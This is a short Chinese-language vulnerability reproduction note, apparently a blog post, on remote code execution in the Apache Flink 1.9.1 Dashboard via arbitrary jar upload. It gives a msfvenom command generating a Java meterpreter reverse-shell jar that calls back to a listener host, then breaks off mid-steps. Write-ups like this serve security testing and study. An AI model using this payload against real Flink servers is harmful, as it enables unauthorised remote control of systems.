Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切.
漏洞概述:
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。
漏洞版本:
至目前最新版本Apache Flink 1.9.1
漏洞复现:
1.测试环境:Flink 1.9.1 java8+
2. 生成远控制木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=8087 -f jar > rce.jar
3. 将木马传入到Apache Flink里
4.使用